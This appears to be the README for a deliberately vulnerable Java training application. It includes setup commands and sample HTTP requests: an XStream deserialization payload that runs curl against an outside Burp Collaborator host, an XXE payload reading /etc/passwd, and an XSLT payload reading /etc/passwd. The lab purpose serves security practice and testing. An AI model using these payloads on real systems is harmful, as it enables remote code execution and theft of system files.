Vulnerable to:
- deserialization attacks (OWASP Top 10 A8)
- XXE (OWASP Top 10 A4)
- XSLT abuse (XSLT 1.0 and 2.0)
git clone https://github.com/eoftedal/deserialize.gitcd deserializemvn jetty:run
Accessible on port 8080
git clone https://github.com/eoftedal/deserialize.gitcd deserializedocker build -t deserialize .docker run -p 8080:8080 -it deserialize
POST /api/contacts HTTP/1.1
Host: localhost
Content-Type: application/xml
Accept: application/xml
<contact>
<firstName>yo</firstName>
<lastName>lo</lastName>
<email>[email protected]</email>
</contact>
POST /api/contacts HTTP/1.1
Host: localhost
Content-Type: application/xml
Accept: application/xml
<dynamic-proxy>
<interface>org.insecurelabs.api.contacts.Contact</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command><string>/usr/bin/curl</string><string>http://[yourid].burpcollaborator.net</string></command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
POST /api/contacts HTTP/1.1
Host: localhost
Content-Type: application/xml
Accept: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ELEMENT string (#PCDATA)>
<!ENTITY content SYSTEM "file:/etc/passwd">
]>
<contact>
<firstName>&content;</firstName>
<lastName>lo</lastName>
<email>[email protected]</email>
</contact>
You have to run at least one normal request first.
POST /api/contacts/1/html HTTP/1.1
Host: localhost
Content-Type: application/xslt
Accept: text/html
Content-Length: 241
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
You can also use URLs instead of file names with unparsed-text(). And of course XXE in the XSLT.
http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/